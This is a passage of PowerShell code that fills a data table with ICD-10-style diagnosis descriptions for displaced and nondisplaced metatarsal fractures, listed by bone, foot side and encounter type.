fracture of first metatarsal bone, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, left foot","Displaced fracture of first metatarsal bone, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, unspecified foot","Displaced fracture of first metatarsal bone, unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, unspecified foot","Displaced fracture of first metatarsal bone, unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, unspecified foot","Displaced fracture of first metatarsal bone, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, unspecified foot","Displaced fracture of first metatarsal bone, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, unspecified foot","Displaced fracture of first metatarsal bone, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, unspecified foot","Displaced fracture of first metatarsal bone, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, unspecified foot","Displaced fracture of first metatarsal bone, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, right foot","Nondisplaced fracture of first metatarsal bone, right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, right foot","Nondisplaced fracture of first metatarsal bone, right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, right foot","Nondisplaced fracture of first metatarsal bone, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, right foot","Nondisplaced fracture of first metatarsal bone, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, right foot","Nondisplaced fracture of first metatarsal bone, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, right foot","Nondisplaced fracture of first metatarsal bone, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, right foot","Nondisplaced fracture of first metatarsal bone, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, left foot","Nondisplaced fracture of first metatarsal bone, left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, left foot","Nondisplaced fracture of first metatarsal bone, left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, left foot","Nondisplaced fracture of first metatarsal bone, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, left foot","Nondisplaced fracture of first metatarsal bone, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, left foot","Nondisplaced fracture of first metatarsal bone, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, left foot","Nondisplaced fracture of first metatarsal bone, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, left foot","Nondisplaced fracture of first metatarsal bone, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, unspecified foot","Nondisplaced fracture of first metatarsal bone, unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, unspecified foot","Nondisplaced fracture of first metatarsal bone, unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, unspecified foot","Nondisplaced fracture of first metatarsal bone, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, unspecified foot","Nondisplaced fracture of first metatarsal bone, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, unspecified foot","Nondisplaced fracture of first metatarsal bone, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, unspecified foot","Nondisplaced fracture of first metatarsal bone, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of first metatarsal bone, unspecified foot","Nondisplaced fracture of first metatarsal bone, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, right foot","Displaced fracture of second metatarsal bone, right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, right foot","Displaced fracture of second metatarsal bone, right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, right foot","Displaced fracture of second metatarsal bone, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, right foot","Displaced fracture of second metatarsal bone, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, right foot","Displaced fracture of second metatarsal bone, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, right foot","Displaced fracture of second metatarsal bone, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, right foot","Displaced fracture of second metatarsal bone, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, left foot","Displaced fracture of second metatarsal bone, left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, left foot","Displaced fracture of second metatarsal bone, left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, left foot","Displaced fracture of second metatarsal bone, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, left foot","Displaced fracture of second metatarsal bone, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, left foot","Displaced fracture of second metatarsal bone, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, left foot","Displaced fracture of second metatarsal bone, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, left foot","Displaced fracture of second metatarsal bone, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, unspecified foot","Displaced fracture of second metatarsal bone, unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, unspecified foot","Displaced fracture of second metatarsal bone, unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, unspecified foot","Displaced fracture of second metatarsal bone, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, unspecified foot","Displaced fracture of second metatarsal bone, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, unspecified foot","Displaced fracture of second metatarsal bone, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, unspecified foot","Displaced fracture of second metatarsal bone, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of second metatarsal bone, unspecified foot","Displaced fracture of second metatarsal bone, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, right foot","Nondisplaced fracture of second metatarsal bone, right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, right foot","Nondisplaced fracture of second metatarsal bone, right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, right foot","Nondisplaced fracture of second metatarsal bone, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, right foot","Nondisplaced fracture of second metatarsal bone, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, right foot","Nondisplaced fracture of second metatarsal bone, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, right foot","Nondisplaced fracture of second metatarsal bone, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, right foot","Nondisplaced fracture of second metatarsal bone, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, left foot","Nondisplaced fracture of second metatarsal bone, left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, left foot","Nondisplaced fracture of second metatarsal bone, left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, left foot","Nondisplaced fracture of second metatarsal bone, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, left foot","Nondisplaced fracture of second metatarsal bone, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, left foot","Nondisplaced fracture of second metatarsal bone, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, left foot","Nondisplaced fracture of second metatarsal bone, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, left foot","Nondisplaced fracture of second metatarsal bone, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, unspecified foot","Nondisplaced fracture of second metatarsal bone, unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, unspecified foot","Nondisplaced fracture of second metatarsal bone, unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, unspecified foot","Nondisplaced fracture of second metatarsal bone, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, unspecified foot","Nondisplaced fracture of second metatarsal bone, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, unspecified foot","Nondisplaced fracture of second metatarsal bone, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, unspecified foot","Nondisplaced fracture of second metatarsal bone, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of second metatarsal bone, unspecified foot","Nondisplaced fracture of second metatarsal bone, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, right foot","Displaced fracture of third metatarsal bone, right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, right foot","Displaced fracture of third metatarsal bone, right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, right foot","Displaced fracture of third metatarsal bone, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, right foot","Displaced fracture of third metatarsal bone, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, right foot","Displaced fracture of third metatarsal bone, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, right foot","Displaced fracture of third metatarsal bone, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, right foot","Displaced fracture of third metatarsal bone, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, left foot","Displaced fracture of third metatarsal bone, left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, left foot","Displaced fracture of third metatarsal bone, left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, left foot","Displaced fracture of third metatarsal bone, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, left foot","Displaced fracture of third metatarsal bone, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, left foot","Displaced fracture of third metatarsal bone, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, left foot","Displaced fracture of third metatarsal bone, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, left foot","Displaced fracture of third metatarsal bone, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, unspecified foot","Displaced fracture of third metatarsal bone, unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, unspecified foot","Displaced fracture of third metatarsal bone, unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, unspecified foot","Displaced fracture of third metatarsal bone, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, unspecified foot","Displaced fracture of third metatarsal bone, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, unspecified foot","Displaced fracture of third metatarsal bone, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, unspecified foot","Displaced fracture of third metatarsal bone, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of third metatarsal bone, unspecified foot","Displaced fracture of third metatarsal bone, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, right foot","Nondisplaced fracture of third metatarsal bone, right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, right foot","Nondisplaced fracture of third metatarsal bone, right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, right foot","Nondisplaced fracture of third metatarsal bone, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, right foot","Nondisplaced fracture of third metatarsal bone, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, right foot","Nondisplaced fracture of third metatarsal bone, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, right foot","Nondisplaced fracture of third metatarsal bone, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, right foot","Nondisplaced fracture of third metatarsal bone, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, left foot","Nondisplaced fracture of third metatarsal bone, left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, left foot","Nondisplaced fracture of third metatarsal bone, left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, left foot","Nondisplaced fracture of third metatarsal bone, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, left foot","Nondisplaced fracture of third metatarsal bone, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, left foot","Nondisplaced fracture of third metatarsal bone, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, left foot","Nondisplaced fracture of third metatarsal bone, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, left foot","Nondisplaced fracture of third metatarsal bone, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, unspecified foot","Nondisplaced fracture of third metatarsal bone, unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, unspecified foot","Nondisplaced fracture of third metatarsal bone, unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, unspecified foot","Nondisplaced fracture of third metatarsal bone, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, unspecified foot","Nondisplaced fracture of third metatarsal bone, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, unspecified foot","Nondisplaced fracture of third metatarsal bone, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, unspecified foot","Nondisplaced fracture of third metatarsal bone, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of third metatarsal bone, unspecified foot","Nondisplaced fracture of third metatarsal bone, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, right foot","Displaced fracture of fourth metatarsal bone, right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, right foot","Displaced fracture of fourth metatarsal bone, right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, right foot","Displaced fracture of fourth metatarsal bone, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, right foot","Displaced fracture of fourth metatarsal bone, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, right foot","Displaced fracture of fourth metatarsal bone, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, right foot","Displaced fracture of fourth metatarsal bone, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, right foot","Displaced fracture of fourth metatarsal bone, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, left foot","Displaced fracture of fourth metatarsal bone, left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, left foot","Displaced fracture of fourth metatarsal bone, left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, left foot","Displaced fracture of fourth metatarsal bone, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, left foot","Displaced fracture of fourth metatarsal bone, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, left foot","Displaced fracture of fourth metatarsal bone, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, left foot","Displaced fracture of fourth metatarsal bone, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, left foot","Displaced fracture of fourth metatarsal bone, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, unspecified foot","Displaced fracture of fourth metatarsal bone, unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, unspecified foot","Displaced fracture of fourth metatarsal bone, unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, unspecified foot","Displaced fracture of fourth metatarsal bone, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, unspecified foot","Displaced fracture of fourth metatarsal bone, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, unspecified foot","Displaced fracture of fourth metatarsal bone, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, unspecified foot","Displaced fracture of fourth metatarsal bone, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fourth metatarsal bone, unspecified foot","Displaced fracture of fourth metatarsal bone, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, right foot","Nondisplaced fracture of fourth metatarsal bone, right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, right foot","Nondisplaced fracture of fourth metatarsal bone, right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, right foot","Nondisplaced fracture of fourth metatarsal bone, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, right foot","Nondisplaced fracture of fourth metatarsal bone, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, right foot","Nondisplaced fracture of fourth metatarsal bone, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, right foot","Nondisplaced fracture of fourth metatarsal bone, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, right foot","Nondisplaced fracture of fourth metatarsal bone, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, left foot","Nondisplaced fracture of fourth metatarsal bone, left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, left foot","Nondisplaced fracture of fourth metatarsal bone, left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, left foot","Nondisplaced fracture of fourth metatarsal bone, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, left foot","Nondisplaced fracture of fourth metatarsal bone, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, left foot","Nondisplaced fracture of fourth metatarsal bone, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, left foot","Nondisplaced fracture of fourth metatarsal bone, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, left foot","Nondisplaced fracture of fourth metatarsal bone, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, unspecified foot","Nondisplaced fracture of fourth metatarsal bone, unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, unspecified foot","Nondisplaced fracture of fourth metatarsal bone, unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, unspecified foot","Nondisplaced fracture of fourth metatarsal bone, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, unspecified foot","Nondisplaced fracture of fourth metatarsal bone, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, unspecified foot","Nondisplaced fracture of fourth metatarsal bone, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, unspecified foot","Nondisplaced fracture of fourth metatarsal bone, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fourth metatarsal bone, unspecified foot","Nondisplaced fracture of fourth metatarsal bone, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, right foot","Displaced fracture of fifth metatarsal bone, right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, right foot","Displaced fracture of fifth metatarsal bone, right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, right foot","Displaced fracture of fifth metatarsal bone, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, right foot","Displaced fracture of fifth metatarsal bone, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, right foot","Displaced fracture of fifth metatarsal bone, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, right foot","Displaced fracture of fifth metatarsal bone, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, right foot","Displaced fracture of fifth metatarsal bone, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, left foot","Displaced fracture of fifth metatarsal bone, left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, left foot","Displaced fracture of fifth metatarsal bone, left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, left foot","Displaced fracture of fifth metatarsal bone, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, left foot","Displaced fracture of fifth metatarsal bone, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, left foot","Displaced fracture of fifth metatarsal bone, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, left foot","Displaced fracture of fifth metatarsal bone, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, left foot","Displaced fracture of fifth metatarsal bone, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, unspecified foot","Displaced fracture of fifth metatarsal bone, unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, unspecified foot","Displaced fracture of fifth metatarsal bone, unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, unspecified foot","Displaced fracture of fifth metatarsal bone, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, unspecified foot","Displaced fracture of fifth metatarsal bone, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, unspecified foot","Displaced fracture of fifth metatarsal bone, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, unspecified foot","Displaced fracture of fifth metatarsal bone, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of fifth metatarsal bone, unspecified foot","Displaced fracture of fifth metatarsal bone, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, right foot","Nondisplaced fracture of fifth metatarsal bone, right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, right foot","Nondisplaced fracture of fifth metatarsal bone, right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, right foot","Nondisplaced fracture of fifth metatarsal bone, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, right foot","Nondisplaced fracture of fifth metatarsal bone, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, right foot","Nondisplaced fracture of fifth metatarsal bone, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of fifth metatarsal bone, right foot","Nondisplaced fracture of fifth metatarsal bone, right foot, subsequent encounter for fracture with malunion") + $null = 